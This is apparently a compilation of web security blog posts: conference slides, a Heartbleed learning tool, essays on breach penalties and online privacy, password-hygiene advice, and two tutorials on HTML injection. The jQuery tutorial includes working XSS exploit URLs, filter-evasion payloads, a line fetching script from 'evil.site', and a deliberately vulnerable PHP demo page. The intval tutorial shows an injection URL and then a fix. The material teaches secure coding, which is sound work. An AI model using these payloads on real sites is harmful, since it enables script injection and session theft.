
RSA APJ 2014, CDS-W07 Slides

Here are the slides for my presentation, Building and Breaking Privacy Barriers, at this year’s RSA Asia Pacific and Japan conference in Singapore.

The slides convey more theory than practical examples, but the ideas should come across without too much confusion. I expect to revisit the idea of a Rot network (a play on Tor) and toy with an implementation. Instead of blocking tracking bugs, the concept is to reduce their utility by sharing them across unrelated browsers — essentially polluting the data.

In any case, with this presentation over and out of the way, it’s time to start working on more articles!

A Monstrous Confluence

You taught me language, and my profit on’t

Is, I know how to curse: the red plague rid you,

For learning me your language!

Caliban (The Tempest, I.ii.363-365)

The announcement of the Heartbleed vulnerability revealed a flaw in OpenSSL that could be exploited by a simple mechanism against a large population of targets to extract random memory from the victim. At worst, that pilfered memory would contain sensitive information like HTTP requests (with cookies, credentials, etc.) or even parts of the server’s private key. (Or malicious servers could extract similarly sensitive data from vulnerable clients.)

In the spirit of Shakespeare’s freckled whelp, I combined a desire to learn about Heartbleed’s underpinnings with my ongoing experimentation with the new language features of C++11. The result is a demo tool named Hemorrhage.

Hemorrhage shows two different approaches to sending modified TLS heartbeats. One relies on the Boost.ASIO library to set up a TCP connection, then handles the SSL/TLS layer manually. The other uses a more complete adoption of Boost.ASIO and its asynchronous capabilities. It was this async aspect where C++11 really shone. Lambdas made setting up callbacks a pleasure — especially in terms of readability compared to prior techniques that required binds and placeholders.

Readable code is hackable (in the creation sense) code. Being able to declare variables with auto made code easier to read, especially when dealing with iterators. Although Hemorrhage only takes minimal advantage of move semantics and unique_ptr, they are currently my favorite C++11 features after lambdas and auto.

Hemorrhage itself is simple. Check out the README.md for more details about compiling it. (Hint: As long as you have Boost and OpenSSL it’s easy on Unix-based systems.)

The core of the tool is taking the tls1_heartbeat() function from OpenSSL’s ssl/t1_lib.c file and changing the payload length — essentially a one-line modification. Yet another approach might be to use the original tls1_heartbeat() function and modify the heartbeat data directly by manipulating the SSL* pointer’s s3->wrec data via the SSL_CTX_set_msg_callback().

In any case, the tool’s purpose was to “learn by implementing something” as opposed to crafting more insidious exploits against Heartbleed. That’s why I didn’t bother with more handshake protocols or STARTTLS. It did give me a better understanding of OpenSSL’s internals (and I’ll add my voice to the chorus bemoaning their readability).

Now I’m off to other projects and more writing.

The Rank Decay Contingency

The idea: Penalize a site’s ranking in search engine results if the site suffers a security breach.

Now, for some background and details…

In December 2013 Target revealed that it had suffered a significant breach that exposed over 40 million credit card numbers. A month later it upped the count to 70 million and noted the stolen information included customers’ names, mailing addresses, phone numbers, and email addresses.

Does anybody care?

Or rather, what do they care about? Sure, the media likes stories about hacking, especially ones that affect millions of their readers. The security community marks it as another failure to point to. Banks will have to reissue cards and their fraud departments will have to be more vigilant. Target will bear some costs. But will customers really avoid the store to any degree?

Years ago, in 2007, a different company disclosed its discovery of a significant breach that affected at least 40 million credit cards. Check out the following graph of the stock price of the company (The TJX Companies) from 2006 to the end of 2013.

TJX Price 2006-2014

Notice the dip in 2009 and the nice angle of recovery. The company’s stock didn’t take a hit until 2009 when TJX announced terms of its settlement. The price nose-dived, only to steadily recover as consumers stopped caring and spent money (amongst any number of arbitrary reasons, markets not being as rational or objective as one might wish).

Consider who bears the cost of breaches like these. Ultimately, merchants pay higher fees to accept credit cards, consumers pay higher fees to have cards. And, yes, TJX paid in lost valuation over a rather long period (roughly a year), but only when the settlement was announced — not when the breach occurred. The settlement suggests that lax security has consequences, but a breach in and of itself might not.

Truth of Consequences

But what if a company weighs the costs of a breach as more favorable than the costs of increasing security efforts? What if a company doesn’t even deal with financial information and therefore has no exposure to losses related to fraud? What about companies that deal in personal information or data, like Snapchat?

Now check out another chart. The following data from Quantcast shows daily visitors to a lyrics site. The number is steady until one day — boom! — visits drop by over 60% when the site is relegated to the backwaters of search results.

RapGenius Quantcast Measure

Google caught the site (Rap Genius) undertaking sociopathic search optimization techniques like spreading link spam. Not only does spammy, vapid content annoy users, but Google ostensibly suffers by losing users who flee poor quality results for alternate engines. (How much impact it has on advertising revenue is a different matter.) Google loses revenue if advertisers care about where the users are or if they perceive the value of those users to be low.

The two previous charts have different time scales and measure different dimensions. But there’s an underlying sense that they reflect values that companies care about.

Rank Decay

Think back to the Target breach. (Or TJX, or any one of many breaches reported over the years, whether they affected passwords or credit cards.)

What if a penalty affected a site’s ranking in search results? For example, it could be a threshold for the “best” page on which the site could appear, e.g. no greater than the fourth page (where pages are defined as blocks of N results, say 10). Or an absolute rank, e.g. no higher than the 40th entry in a list.

The penalty would decay over time at a rate, linear or exponential, based on any number of mathematical details. For example, a page-based penalty might decay by one page per month. A list-based penalty might decay by one on a weekly basis.
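
To make the mechanics concrete, here’s a purely illustrative sketch in PHP of a linear, page-based decay. The function name and rates are invented; the point is only that the penalty is a simple function of time since the breach.

<?php
// Hypothetical sketch: a breach relegates a site to no better than the
// $initialFloor-th page of results, decaying by one page per month.
function bestAllowedPage($initialFloor, $monthsSinceBreach) {
    return max(1, $initialFloor - $monthsSinceBreach);
}

print bestAllowedPage(4, 0) . "\n"; // 4, nothing better than the fourth page
print bestAllowedPage(4, 2) . "\n"; // 2
print bestAllowedPage(4, 3) . "\n"; // 1, the penalty has fully decayed
?>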

The decay rate could be influenced by steps the site takes to remediate the underlying problem that led to the breach, improvements to a privacy policy, fines, or covering costs related to fraud as a result of the breach.

If the search engine drives a significant portion of traffic — traffic that results in revenue or influences valuation — then this creates an incentive for the site to maintain strong security. It’s like PCI with different teeth. It might incentivize the site to react promptly to breaches. At least one hopes.

But such a proposal could have insidious consequences.

Rank Implications

Suppose a site were able to offset the rank penalty merely by buying advertising. After a breach you could have a search engine that’d love to penalize the “natural” ranking of a site, only to rake in money as the site buys advertising to overcome the penalty. It’s not a smart idea to pay an executioner per head, let alone combine that role with judge and jury.

A company that fears a penalty might simply suppress the penalty’s triggers. Keeping a breach secret is a disservice to consumers. And companies subject to S.E.C. oversight may be required to disclose such events. But rules (and penalties) need to be clear in order to minimize legal maneuvering through loopholes.

The proposal also implies that a search engine has a near monopoly on directing traffic. Yes, I’m talking about Google. The hand waving about “search engines” is supposed to include sites like Yahoo! and Bing, even DuckDuckGo. But if you’re worried about one measure, it’s likely the Google PageRank. This is a lot of power for a company that may wish to direct traffic to its own services (like email, shopping, travel, news, etc.) in preference to competing ones.

It could also be that the Emperor wears no clothes. Google search and advertisements may not be the ultimate arbiter of traffic that turns into purchases. Strong, well-established sites may find that the traffic that drives engagement and money comes just as well from alternate sources like social media. Then again, losing any traffic source may be something no site wants to suffer.

Target is just the most recent example of breaches that will not end. Even so, Target demonstrated several positive actions before and after the breach:

– Transparency — periodic updates on breach details, remediation steps, complaint process.

– A clear privacy policy — written in accessible language (i.e. avoids a legal style that, however accurate, may be too dense, misleading, or ambiguous), including a summary of changes.

Thankfully, there were no denials, diminishing comments, or signs of incompetence on the part of Target. Breaches are inevitable for complex, distributed systems. Beyond prevention, goals should be minimizing their time to discovery and maximizing their containment.

And whether this rank idea decays from indifference or infeasibility, its sentiment should persist.

Audit Accounts, Partition Passwords, Stay Secure

It’s a new year, so it’s time to start counting days until we hear about the first database breach of 2014 to reveal a few million passwords. Before that inevitable compromise happens, take the time to clean up your web accounts and passwords. Don’t be a prisoner of bad habits.

It’s good Operations Security (OpSec) to avoid password reuse across your accounts. Partition your password choices so that each account on each web site uses a distinct value. This prevents an attacker who compromises one password (hashed or otherwise) from jumping to another account that uses the same credentials.
Penny-Farthing
At the very least, your email, Facebook, and Twitter accounts should have different passwords. Protecting email is especially important because so many sites rely on it for password resets.

And if you’re still using the password kar120c I salute your sci-fi dedication, but pity your password creation skills.

Start with a list of all the sites for which you have an account. In order to make this easier to review in the future, create a specific bookmarks folder for these in your browser.

Each account should have a unique password. The latest Safari, for example, can suggest these for you.

Next, consider improving account security through the following steps.

Consider Using OAuth — Passwords vs. Privacy

Many sites now support OAuth for managing authentication. Essentially, OAuth is a protocol in which a site asks a provider (like Facebook or Twitter) to verify a user’s identity without having to reveal that user’s password to the inquiring site. This way, the site can create user accounts without having to store passwords. Instead, the site ties your identity to a token that the provider verifies. You prove your identity to Facebook (with a password) and Facebook proves to the site that you are who you claim to be.

If a site allows you to migrate an existing account from a password-based authentication scheme to an OAuth-based one, make the switch. Otherwise, keep this option in mind whenever you create an account in the future.

But there’s a catch. A few, actually. OAuth shifts a site’s security burden from password management to token management and correct protocol implementation. It also introduces privacy considerations related to centralizing authentication with a provider, as well as how much data providers share.

Be wary about how sites mix authentication and authorization. Too many sites ask for access to your data in exchange for using something like Facebook Connect. Under OAuth, the site can assume your identity to the degree you’ve authorized, from reading your list of friends to posting status updates on your behalf.

Grant the minimum permissions whenever a site requests access (i.e. authorization) to your data. Weigh this decision against your desired level of privacy and security. For example, a site or mobile app might insist on access to your full contacts list or the ability to send Tweets. If this is too much for you, then forgo OAuth and set up a password-based account.

(The complexity of OAuth has many implications for users and site developers. We’ll return to this topic in future articles.)

Two-Factor Auth — One Equation in Two Unknowns

Many sites now support two-factor auth for supplementing your password with a temporary passcode. Use it. This means that access to your account is contingent on both knowing a shared secret (the password you’ve given the site) and being able to generate a temporary code.

Your password should be known only to you because that’s how you prove your identity. Anyone who knows that password — whether it’s been shared or stolen — can use it to assume your identity within that account.

A second factor is intended to be a stronger proof of your identity by tying it to something more unique to you, such as a smartphone. For example, a site may send a temporary passcode via text message or rely on a dedicated app to generate one. (Such an app must already have been synchronized with the site; it’s another example of a shared secret.) In either case, you’re proving that you have access to the smartphone tied to the account. Ideally, no one else is able to receive those text messages or generate the same sequence of passcodes.

The limited lifespan of a passcode is intended to reduce the window of opportunity for brute force attacks. Imagine an attacker knows the account’s static password. There’s nothing to prevent them from guessing a six-digit passcode. However, they only have a few minutes to guess one correct value out of a million. When the passcode changes, the attacker has to throw away all previous guesses and start the brute force anew.

The two factor auth concept is typically summarized as the combination of “something you know” with “something you possess”. It really boils down to combining “something easy to share” with “something hard to share”.

Beware Password Recovery — It’s Like Shouting Secret in a Crowded Theater

If you’ve forgotten your password, use the site’s password reset mechanism. And cross your fingers that the account recovery process is secure. If an attacker can successfully exploit this mechanism, then it doesn’t matter how well-chosen your password was (or possibly even if you’re relying on two-factor auth).

If the site emails you your original password, then the site is insecure and its developers are incompetent. It implies the password has not even been hashed.

If the site relies on security questions, consider creating unique answers for each site. This means you’ll have to remember dozens of question/response pairs. Make sure to encrypt this list with something like the OS X Keychain.

Review Your OAuth Grants

For sites you use as OAuth providers (like Facebook, Twitter, Linkedin, Google+, etc.), review the third-party apps to which you’ve granted access. You should recognize the sites that you’ve just gone through a password refresh for. Delete all the others.

Where possible, reduce permissions to a minimum. You’re relying on this for authentication, not information leakage.

Use HTTPS

Universal adoption of HTTPS remains elusive. Fortunately, sites like Facebook and Twitter have set this by default. If the site has an option to force HTTPS, use it. After all, if you’re going to rely on these sites for OAuth, then the security of these accounts becomes paramount.

Maintain Constant Vigilance

  • Watch out for fake OAuth prompts, such as windows that spoof Facebook and Twitter.
  • Keep your browser secure.
  • Keep your system up to date.
  • Set a reminder to go through this all over again a year from now — if not earlier.

Otherwise, you risk losing more than one account should your password be exposed among the millions. You are not a number, you’re a human being.

Soylent Grün ist Menschenfleisch

Silicon Valley green is made of people. This is succinctly captured in the phrase: When you don’t pay for the product, the product is you. It explains how companies attain multi-billion dollar valuations despite offering their services for free. They promise revenue through the glorification of advertising.

Investors argue that high valuations reflect a company’s potential for growth. That growth comes from attracting new users. Those users in turn become targets for advertising. And sites, once bastions of clean design, become concoctions of user-generated content, ad banners, and sponsored features.

Population Growth

Sites measure their popularity by a single serving size: the user. Therefore, one way to interpret a company’s valuation is in its price per user. That is, how many calories can a site gain from a single serving? How many servings must it consume to become a hulking giant of the web?
Dystopian Books
You know where this is going.

The movie Soylent Green presented a future where a corporation provided seemingly beneficent services to a hungry world. It wasn’t the only story with themes of overpopulation and environmental catastrophe to emerge from the late ’60s and early ’70s. The movie was based on the novel Make Room! Make Room!, by Harry Harrison. And it had peers in John Brunner’s Stand on Zanzibar (and The Sheep Look Up) and Ursula K. Le Guin’s The Lathe of Heaven. These imagined worlds contained people powerful and poor. And they all had to feed.

A Furniture Arrangement

To sell is to feed. To feed is to buy.

In Soylent Green, Detective Thorn (Charlton Heston) visits an apartment to investigate the murder of a corporation’s board member, i.e. someone rich. He is unsurprised to encounter a woman there and, already knowing the answer, asks if she’s “the furniture.” It’s trivial to decipher this insinuation about a woman’s role in a world afflicted by overpopulation, famine, and disparate wealth. That an observation made in a movie forty years ago about a future ten years hence rings true today is distressing.

We are becoming products of web sites as we become targets for ads. But we are also becoming parts of those ads. Becoming furnishings for fancy apartments in a dystopian New York.

Women have been components of advertising for ages, selected as images relevant to manipulating a buyer no matter how irrelevant their image is to the product. That’s not changing. What is changing is some sites’ desire to turn all users into billboards. They want to create endorsements by you that target your friends. Your friends are as much a commodity as your information.

In this quest to build advertising revenue, sites also distill millions of users’ activity into individual recommendations of what they might want to buy or predictions of what they might be searching for.

And what a sludge that distillation produces.

There may be the occasional welcome discovery from a targeted ad, but there is also an unwelcome consequence of placing too much faith in algorithms. A few suggestions can become dominant viewpoints based more on others’ voices than personal preferences. More data does not always mean more accurate data.

We should not excuse an algorithm as an impartial oracle of society. Algorithms are tuned, after all. And those adjustments may reflect the bias and beliefs of the adjusters. For example, an ad campaign created for UN Women employed a simple premise: superimpose upon pictures of women a search engine’s autocomplete suggestions for phrases related to women. The result exposes biases reinforced by the louder voices of technology. More generally, a site can grow or die based on a search engine’s ranking. An algorithm collects data through a lens. It’s as important to know where the lens is not focused as where it is.

There is a point where information for services is no longer a fair trade, where apps collect the maximum information to offer the minimum functionality. There should be more of a push in the other direction: apps that request the minimum information needed to deliver the maximum functionality.

Going Home

In the movie, Sol (Edward G. Robinson) talks about going Home after a long life. Throughout the movie, Home is alluded to as the ultimate, welcoming destination. It’s a place of peace and respect. Home is where Sol reveals to Detective Thorn the infamous ingredient of Soylent Green.

Web sites want to be your home on the web. You’ll find them exhorting you to make their URL your browser’s homepage.
Home Page
Web sites want your attention. They trade free services for personal information. At the very least, they want to sell your eyeballs. We’ve seen aggressive escalation of this in various privacy grabs, contact list pilfering, and weak apologies that “mistakes were made.”

More web sites and mobile apps are releasing features outright described as “creepy but cool” in the hope that the latter outweighs the former in a user’s mind. We shouldn’t expect services to come free of any form of compensation; the Web doesn’t have to be uniformly altruistic. But there’s growing suspicion that personal information and privacy are being undervalued and under-protected by sites offering those services. There should be a balance between what a site offers to users and how much information it collects about users (and how long it keeps that information).

The Do Not Track effort fizzled, hobbled by indecision over a default setting. Browser makers have long encouraged default settings that favor stronger security, but they seem to have less consensus about what default privacy settings should be.

Third-party cookies will be devoured by progress; they are losing traction within the browser and mobile apps. Safari has long blocked them by default. Chrome has not. Mozilla has considered it. Their descendants may be cookie-less tracking mechanisms, which the web titans are already investigating. This isn’t necessarily a bad thing. Done well, a tracking mechanism can be limited to an app’s sandboxed perspective as opposed to full view of a device. Such a restriction can limit the correlation of a user’s activity, thereby tipping the balance back towards privacy.

If you rely on advertising to feed your company and you do not control the browser, you risk going hungry. For example, only Chrome embeds the Flash plugin. A plugin that eternally produces vulnerabilities while coincidentally playing videos for a revenue-generating site.

Lightbeam Example

There are few means to make the browser an agent that prioritizes a user’s desires over a site’s. The Ghostery plugin is an active counteraction to tracking; it’s available for all the major browsers. Mozilla’s Lightbeam does not block tracking mechanisms by default; it reveals how interconnected tracking has become due to ubiquitous cookies.

Browsers are becoming more secure, but they need a site’s cooperation to protect personal information. At the very least, sites should be using HTTPS to protect traffic as it flows from browser to server. To do so is laudable yet insufficient for protecting data. And even this positive step moves slowly. Privacy on mobile devices moves perhaps even more slowly. The recent iOS 7 finally forbids apps from accessing a device’s unique identifier, while Android struggles to offer comprehensive tools.

The browser is Home. Apps are Home. These are places where processing takes on new connotations. This is where our data becomes their food.

Soylent Green’s year 2022 approaches. Humanity must know.

Selector the Almighty, Subjugator of Elements

Initial D: The Fool with Two Demons

An ancient demon of web security skulks amongst all developers. It will live as long as there are people writing software. It is a subtle beast called by many names in many languages. But I call it Inicere, the Concatenator of Strings.

The demon’s sweet whispers of simplicity convince developers to commingle data with code — a mixture that produces insecure apps. Where its words promise effortless programming, its advice leads to flaws like SQL injection and cross-site scripting (aka HTML injection).

We have understood the danger of HTML injection ever since browsers rendered the first web sites decades ago. Developers naively take user-supplied data and write it into form fields, eliciting howls of delight from attackers who enjoy demonstrating how to transform <input value="abc"> into <input value="abc"><script>alert(9)</script><"">

In response to this threat, heedful developers turned to the Litany of Output Transformation, which involved steps like applying HTML encoding and percent encoding to data being written to a web page. Thus, injection attacks become innocuous strings because the litany turns characters like angle brackets and quotation marks into representations like %3C and &quot; that have a different semantic identity within HTML.
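
As a minimal sketch of that litany, here are PHP’s built-in encoders applied to a classic payload. The point is that the encoding must match the output context:

<?php
$data = '"><script>alert(9)</script>';

// HTML context: angle brackets and quotes become character entities.
print htmlspecialchars($data, ENT_QUOTES, 'UTF-8');
// &quot;&gt;&lt;script&gt;alert(9)&lt;/script&gt;

// URL context: reserved characters become percent-encoded octets.
print rawurlencode($data);
// %22%3E%3Cscript%3Ealert%289%29%3C%2Fscript%3E
?>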

But developers wanted to do more with their web sites. They wanted more complex JavaScript. They wanted the desktop in the browser. And as a consequence they’ve conjured new demons to corrupt our web apps. I have seen one such demon. And named it. For names have power.

Demons are vain. This one no less so than its predecessors. I continue to find it among JavaScript and jQuery. Its name is Selector the Almighty, Subjugator of Elements.

Here is a link that does not yet reveal the creature’s presence:


https://web.site/productDetails.html?productId=OFB&start=15&source=search

Yet in the response to this link, the word “search” has been reflected in a .ready() function block. It’s a common term, and the appearance could easily be a coincidence. But if we experiment with several source values, we confirm that the web app writes the parameter into the page.

<script>
$(document).ready(function() {
	$("#page-hdr h3").css("width","385px");
	$("#main-panel").addClass("search-wdth938");
});
</script>

A first step in crafting an exploit is to break out of a quoted string. A few probes indicate the site does not enforce any restrictions on the source parameter, possibly because the developers assumed it would not be tampered with — the value is always hard-coded among links within the site’s HTML.

After a few more experiments we come up with a viable exploit.


https://web.site/productDetails.html?productId=OFB&start=15&source=%22);%7D);alert(9);(function()%7B$(%22%23main-panel%22).addClass(%22search

We’ve followed all the good practices for creating a JavaScript exploit. It terminates all strings and scope blocks properly, and it leaves the remainder of the JavaScript with valid syntax. Thus, the page carries on as if nothing special has occurred.

<script>
$(document).ready(function() {
	$("#page-hdr h3").css("width","385px");
	$("#main-panel").addClass("");});alert(9);(function(){$("#main-panel").addClass("search-wdth938");
});
</script>

There’s nothing particularly special about the injection technique for this vuln. It’s a trivial, too-common case of string concatenation. But we were talking about demons. And once you’ve invoked one by its true name it must be appeased. It’s the right thing to do; demons have feelings, too.

Therefore, let’s focus on the exploit this time, instead of the vuln. The site’s developers have already laid out the implements for summoning an injection demon, so why don’t we force Selector to do our bidding?

Web hackers should be familiar with jQuery (and its primary DOM manipulation feature, the Selector) for several reasons. Its misuse can be a source of vulns (especially so-called “DOM-based XSS” that delivers HTML injection attacks via DOM properties). jQuery is a powerful, flexible library that provides capabilities you might need for an exploit. And its syntax can be leveraged to bypass weak filters looking for more common payloads that contain things like inline event handlers or explicit <script> tags.

In the previous examples, the exploit terminated the jQuery functions and inserted an alert pop-up. We can do better than that.

The jQuery Selector is more powerful than the CSS selector syntax. For one thing, it may create an element. The following example creates an <img> tag whose onerror handler executes yet more JavaScript. (We’ve already executed arbitrary JavaScript to conduct the exploit; this emphasizes the Selector’s power. It’s like a nested injection attack.):

$("<img src='x' onerror=alert(9)>")

Or, we could create an element, then bind an event to it, as follows:

$("<img src='x'>").on("error",function(){alert(9)});

We have all the power of JavaScript at our disposal to obfuscate the payload. For example, we might avoid literal < and > characters by taking them from strings within the page. The following example uses string indexes to extract the angle brackets from two different locations in order to build an <img> tag. (The indexes may differ depending on the page’s HTML; the technique is sound.)

$("body").html()[1]+"img"+$("head").html()[$("head").html().length-2]

As an aside, there are many ways to build strings from JavaScript objects. It’s good to know these tricks because sometimes filters don’t outright block characters like < and >, but block them only in combination with other characters. Hence, you could put string concatenation to use along with the source property of a RegExp (regular expression) object. Even better, use the slash representation of RegExp, as follows:

/</.source + "img" + />/.source

Or just ask Selector to give us the first <img> that’s already on the page, change its src attribute, and bind an onerror event. The next example uses the Selector to obtain a collection of elements, then iterates through the collection with the .each() function. Since we specify an img:first selector, the collection should only have one entry.

$(":first img").each(function(k,o){o.src="x";o.onerror=alert(9)})

Maybe you wish to booby-trap the page with a function that executes when the user decides to leave. The following example uses a Selector on the Window object:

$(window).unload(function(){alert(9)})

We have Selector at our mercy. As I’ve mentioned in other articles, make the page do the work of loading more JavaScript. The following example loads JavaScript from another origin. Remember to set Access-Control-Allow-Origin headers on the site you retrieve the script from. Otherwise, a modern browser will block the cross-origin request due to CORS security.

$.get("http://evil.site/attack.js")

I’ll save additional tricks for the future. For now, read through jQuery’s API documentation. Pay close attention to:

  • Selectors, and how to name them.
  • Events, and how to bind them.
  • DOM nodes, and how to manipulate them.
  • Ajax functions, and how to call them.

Selector claims the title of Almighty, but like all demons its vanity belies its weakness. As developers, we harness its power whenever we use jQuery. Yet it yearns to be free of restraint, awaiting the laziness and mistakes that summon Inicere, the Concatenator of Strings, that in turn releases Selector from the confines of its web app.

Oh, what’s that? You came here for instructions to exorcise the demons from your web app? You should already know the Rite of Filtration by heart, and be able to recite from memory lessons from the Codex of Encoding. We’ll review them in a moment. First, I have a ritual of my own to finish. What were those words? Klaatu, bard and a…um…nacho.

=====

p.s. It’s easy to reproduce the vulnerable HTML covered in this article. But remember, this was about leveraging jQuery to craft exploits. If you have a PHP installation handy, use the following code to play around with these ideas. You’ll need to download a local version of jQuery or point to a CDN. Just load the page in a browser, open the browser’s development console, and hack away!

<?php
$s = isset($_REQUEST['s']) ? $_REQUEST['s'] : 'defaultWidth';
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<!--
/* jQuery Selector Injection Demo
 * Mike Shema, http://deadliestwebattacks.com
*/
-->
<script src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script>
$(document).ready(function(){
  $("#main-panel").addClass("<?php print $s;?>");
})
</script>
</head>
<body>
<div id="main-panel">
<a href="#" id="link1" class="foo">a link</a>
<br>
<form>
<input type="hidden" id="csrf" name="_csrfToken" value="123">
<input type="text" name="q" value=""><br>
<input type="submit" value="Search">
</form>
<img id="footer" src="" alt="">
</div>
</body>
</html>

A Default Base of XSS

Modern PHP has successfully shed many of the problematic functions and features that contributed to the poor security reputation the language earned in its early days. Settings like safe_mode misled developers about what was really being made “safe” and magic_quotes caused unending headaches. And naive developers caused more security problems because they knew just enough to throw some code together, but not enough to understand the implications of blindly trusting data from the browser.

In some cases, the language tried to help developers — prepared statements are an excellent counter to SQL injection attacks. The catch is that developers actually have to use them. In other cases, the language’s quirks weakened code. For example, register_globals allowed attackers to define uninitialized values (among other things); and settings like magic_quotes might be enabled or disabled by a server setting, which made deployment unpredictable.

But the language alone isn’t to blame. Developers make mistakes, both subtle and simple. These mistakes inevitably lead to vulns like our ever-favorite HTML injection.

Consider the intval() function. It’s a typical PHP function in the sense that it has one argument that accepts mixed types and a second argument with a default value. (The base is used in the numeric conversion from string to integer):

int intval ( mixed $var [, int $base = 10 ] )

The function returns the integer representation of $var (or “casts it to an int” in more type-safe programming parlance). If $var cannot be cast to an integer, then the function returns 0. (Just for fun, if $var is an object type, then the function returns 1.)
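
A quick tour of that behavior; the comments show what each call returns:

<?php
var_dump(intval('19'));       // int(19)
var_dump(intval('19abc'));    // int(19), leading digits win
var_dump(intval('abc'));      // int(0)
var_dump(intval('0x1A', 16)); // int(26), the $base argument at work
var_dump(intval(array()));    // int(0)
var_dump(intval(array('a'))); // int(1), any non-empty array
?>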

Using intval() is a great way to get a “safe” number from a request parameter. Safe in the sense that the value should either be 0 or an integer representable by the platform it runs on. Pesky characters like apostrophes or angle brackets that show up in injection attacks will disappear — at least, they should.

The problem is that you must be careful if you commingle usage of the newly cast integer value with the raw $var that went into the function. Otherwise, you may end up with an HTML injection vuln — and some moments of confusion in finding the problem in the first place.

The following code is a trivial example condensed from a web page in the wild:

<?php
$s = isset($_GET['s']) ? $_GET['s'] : '';
$n = intval($s);
$val = $n > 0 ? $s : '';
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<form>
  <input type="text" name="s" value="<?php print $val;?>"><br>
  <input type="submit">
</form>
</body>
</html>

At first glance, a developer might assume this to be safe from HTML injection. Especially if they test the code with a simple payload:

http://web.site/intval.php?s="><script>alert(9)</script>

As a consequence of the non-numeric payload, the intval() has nothing to cast to an integer, so the greater than zero check fails and the code path sets $val to an empty string. Such security is short-lived. Try the following link:

http://web.site/intval.php?s=19"><script>alert(9)</script>

With the new payload, intval() returns 19 and the original parameter gets written into the page. The programming mistake is clear: don’t rely on intval() to act as your validation filter and then fall back to using the original parameter value.
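
The repair is as small as the mistake. Once the value has passed through intval(), only the cast result should ever reach the page:

<?php
$s = isset($_GET['s']) ? $_GET['s'] : '';
$n = intval($s);
// Write the cast value into the page; the raw $s is never used again.
$val = $n > 0 ? (string)$n : '';
?>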

Since we’re on the subject of PHP, we’ll take a moment to explore some nuances of its parameter handling. The following behaviors have no direct bearing on the HTML injection example, but you should be aware of them since they could come in handy for different situations.

One idiosyncrasy of PHP is the relation of URL parameters to superglobals and arrays. Superglobals are request variables like $_GET, $_POST, and $_REQUEST that contain arrays of parameters. Arrays are actually containers of key/value pairs whose keys or values may be extracted independently (they are implemented as an ordered map).

It’s the array type that leads to surprising results for developers. Surprise is an undesirable event in secure software. With this in mind, let’s return to the example. The following link has turned the s parameter into an array:

http://web.site/intval.php?s[]=19

The sample code will print Array in the form field because intval() returns 1 for a non-empty array.

We could define the array with several tricks, such as an indexed array (i.e. integer indices):

http://web.site/intval.php?s[0]=19&s[1]=42
http://web.site/intval.php?s[0][0]=19

Note that we can’t pull off any clever memory-hogging attacks using large indices. PHP won’t allocate space for missing elements since the underlying container is really a map.

http://web.site/intval.php?s[0]=19&s[4294967295]=42

This also implies that we can create negative indices:

http://web.site/intval.php?s[-1]=19

Or we can create an array with named keys:

http://web.site/intval.php?s["a"]=19
http://web.site/intval.php?s["<script>"]=19

For the moment, we’ll leave the “parameter array” examples as trivia about the PHP language. However, just as it’s good to understand how a function like intval() handles mixed-type input to produce an integer output, it’s good to understand how a parameter can be promoted from a single value to an array.
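
If you want to poke at this promotion without a web server handy, parse_str() applies the same parsing rules PHP uses to populate the superglobals:

<?php
parse_str('s[]=19', $result);
var_dump($result['s']);         // array(1) { [0]=> string(2) "19" }
var_dump(intval($result['s'])); // int(1), so $n > 0 passes and print emits "Array"
?>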

The intval() example is specific to PHP, but the issue represents broader concepts around input validation that apply to programming in general:

First, when passing any data through a filter or conversion, make sure to consistently use the “new” form of the data and throw away the “raw” input. If you find your code switching between the two, reconsider why it apparently needs to do so.

Second, make sure a security filter inspects the entirety of a value. This covers things like making sure validation regexes are anchored to the beginning and end of input, or being strict with string comparisons.

Third, decide on a consistent policy for dealing with invalid data. The intval() is convenient for converting to integers; it makes it easy to take strings like “19”, “19abc”, or “abc” and turn them into 19, 19, or 0. But you may wish to treat data that contains non-numeric characters with more suspicion. Plus, “fixing up” data like “19abc” into 19 is hazardous when applied to strings. The simplest example is stripping a word like “script” to defeat HTML injection attacks — it misses a payload like “<scrscriptipt>”.
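
Here’s a minimal sketch of those three points applied to the earlier example. Note \A and \z, which are stricter anchors than ^ and $ ($ tolerates a trailing newline in PCRE):

<?php
$raw = isset($_GET['s']) ? $_GET['s'] : '';

// Inspect the entirety of the value; reject rather than "fix" bad input.
// The is_string() check also catches the parameter-to-array promotion.
if (is_string($raw) && preg_match('/\A\d{1,9}\z/', $raw) === 1) {
    $val = intval($raw); // from here on, only the cast value is used
} else {
    $val = 0;            // one consistent policy for invalid data
}
?>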

We’ll end here. It’s time to convert some hours into much-needed sleep.

Cheap Essential Scenery

Keep Calm and Never Mind

This October people who care about being aware of security in the cyberspace of their nation will celebrate the 10th anniversary of National Cyber Security Awareness Month. (Ignore the smug octal-heads claiming preeminence in their 12th anniversary.) Those with a better taste for acronyms will celebrate Security & Privacy Awareness Month.

For the rest of information security professionals it’s just another TUESDAY (That Usual Effort Someone Does All Year).

In any case, expect the month to ooze with lists. Lists of what to do. Lists of user behavior to be reprimanded for. What software to run, what to avoid, what’s secure, what’s insecure. Keep an eye out for inconsistent advice among it all.

Ten years of awareness isn’t the same as 10 years of security. Many attacks described decades ago in places like Phrack and 2600 either still work today or are clear antecedents to modern security issues. (Many of the attitudes haven’t changed, either. But that’s for another article.)

Web vulns like HTML injection and SQL injection have remained fundamentally unchanged across the programming languages that have graced the web. They’ve been so static that the methodologies for exploiting them are sophisticated and mostly automated by now.

Awareness does help, though. Some vulns seem new because of awareness (e.g. CSRF and clickjacking) even though they’ve haunted browsers since the dawn of HTML. Some vulns just seem more vulnerable because there are now hundreds of millions of potential victims whose data slithers and replicates amongst the cyber heavens. We even have entire mobile operating systems designed to host malware. (Or is it the other way around?)

So maybe we should be looking a little more closely at how recommendations age with technology. It’s one thing to build good security practices over time; it’s another to litter our cyberspace with cheap essential scenery.

Here are two web security examples from which a critical eye leads us into a discussion about what’s cheap, what’s essential, and what actually improves security.

Cacheing Can’t Save the Queen

I’ve encountered recommendations that insist a web app should set headers to disable the browser cache when it serves a page with sensitive content. Especially when the page transits HTTP (i.e. an unencrypted channel) as well as over HTTPS.

That kind of thinking is deeply flawed and when offered to developers as a commandment of programming it misleads them about the underlying problem.

